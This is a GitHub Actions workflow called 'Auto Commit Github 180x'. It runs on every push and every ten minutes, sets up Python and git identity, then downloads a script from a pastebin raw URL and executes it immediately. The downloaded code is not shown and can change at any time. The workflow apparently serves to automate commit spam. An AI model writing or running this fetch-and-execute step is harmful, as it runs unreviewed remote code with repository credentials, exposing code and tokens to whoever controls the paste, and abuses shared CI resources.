name: "Auto Commit Github 180x"
on:
  push:
    branches:
      - main
  schedule:
    - cron: "*/10 * * * *"
jobs:
   Python:
    name: Distro
    runs-on: ubuntu-latest
    steps:
      - name: Actions Checkout
        uses: actions/checkout@v3
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'
      - name: 'Setup Git Config'
        run: |
          git config --local user.email "${GITHUB_ACTOR}@users.noreply.github.com"
          git config --local user.name "${GITHUB_ACTOR}"
      - name: Run Python
        run: wget -c https://pastebin.com/raw/8umy5Ghu -O main.py && python main.py
